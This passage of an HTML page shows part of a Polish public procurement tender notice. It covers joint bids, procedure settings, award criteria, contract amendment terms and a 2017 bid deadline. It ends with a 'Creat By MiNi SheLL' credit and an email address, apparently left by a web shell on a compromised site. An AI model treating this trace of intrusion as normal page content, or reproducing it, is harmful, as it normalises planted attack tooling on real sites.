- Pełnomocnik, z zastrzeżeniem ppkt. 4), lub wszyscy Wykonawcy, wpisując w miejscu 	przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich 	Wykonawców składających ofertę wspólną.
6)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z 	Pełnomocnikiem, którego adres należy wpisać w formularzu ofertowym.
7)	jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana zamawiający 	może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy 	regulującej współpracę tych Wykonawców.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji z 	otwarcia ofert przekazuje Zamawiającemu ( bez wezwania ) oświadczenie o 	przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w 	art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może 	przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia 	konkurencji w postępowaniu o udzielenie zamówienia.
Ww oświadczenie powinno być złożone w oryginale ( w formie pisemnej ), wzór 	oświadczenia stanowi załącznik nr 4 do SIWZ.
W przypadku Wykonawców wspólnie obiegających się o zamówienie, w/w oświadczenie 	składa oddzielnie w swoim imieniu każdy z Wykonawców.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>20</td></tr><tr><td>Termin wykonania</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana  postanowień zawartej Umowy  w stosunku do treści oferty złożonej przez 	Wykonawcę jest dopuszczalna przy zachowaniu następujących warunków:

1. W zakresie dotyczącym przedmiotu zamówienia, tj. gdy:
a.) zmiany zakresu zamówienia spowodowane zmianą dokumentacji technicznej, skorygowanej przez projektanta i zaakceptowanej przez Zamawiającego.
b.) zmiana sposobu wykonania zamówienia , materiałów budowlanych, sprzętu, urządzeń, gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie.
c.) inne niż wymienione w pkt.1 lit. a-b, jeżeli zmiany są korzystne dla Zamawiającego,
albo wynikają z okoliczności, których nie można było przewidzieć.
2. Zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a.) działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie
terminie,
b.) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac budowlanych lub spełnienie wymogów technologicznych, udokumentowanych w dzienniku budowy,
c.) błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie, 
d.) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie
robót,
e.) konieczności zmiany zakresu robót i finansowania,
f.) konieczności wykonania dodatkowych badań i ekspertyz.

3. W zakresie dotyczącym wynagrodzenia umownego:
a.) zmiana obowiązującej stawki VAT. Jeśli zmiana stawki VAT będzie powodować zmianę kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmiany wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę,
b.) wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla                        Zamawiającego lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu zamówienia.
4. W innych przypadkach, gdy Zamawiający  postanowił zmienić zakres realizowanego zamówienia bądź inne postanowienia Umowy ze względu na nowe okoliczności, o których nie wiedział zawierając Umowę.
5. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, nie stanowią jednocześnie zobowiązania Zamawiającego do ich wprowadzenia.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com